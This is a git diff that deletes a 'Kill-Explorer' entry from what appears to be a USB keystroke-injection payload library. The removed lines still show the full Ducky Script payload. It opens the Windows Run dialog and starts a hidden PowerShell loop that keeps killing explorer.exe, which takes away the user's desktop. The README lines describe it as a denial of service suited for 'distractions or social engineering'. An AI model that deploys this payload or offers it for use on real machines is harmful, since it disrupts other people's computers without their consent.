Delete payloads/library/execution/Kill-Explorer directory
parent
5928326db7
commit
8eba7c5e9b
|
@ -1,12 +0,0 @@
|
|||
REM_BLOCK
|
||||
Title: Kill-Explorer
|
||||
Version 1.0
|
||||
Target: Windows 10, 11
|
||||
Author: Nate
|
||||
Brief Description: Kill the explorer process repeatedly causing loss of Windows Desktop functionality.
|
||||
END_REM
|
||||
|
||||
DELAY 2500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN powershell /w 1 while($true){kill -name explorer}
|
|
@ -1,11 +0,0 @@
|
|||
# Kill-Explorer
|
||||
A ducky script that kills explorer.exe repeatedly resulting in loss of Windows Desktop functionality. The command executed is a simple Denial of Service for the intended user.
|
||||
## Configuration
|
||||
1. Execute on windows 10 or Windows 11.
|
||||
2. Logoff or restart to reset your windows session.
|
||||
## Notes
|
||||
A great tool for distractions or social engineering.
|
||||
## Windows Command (used in payload)
|
||||
```Powershell
|
||||
powershell /w 1 while($true){kill -name explorer}
|
||||
```
|
Loading…
Reference in New Issue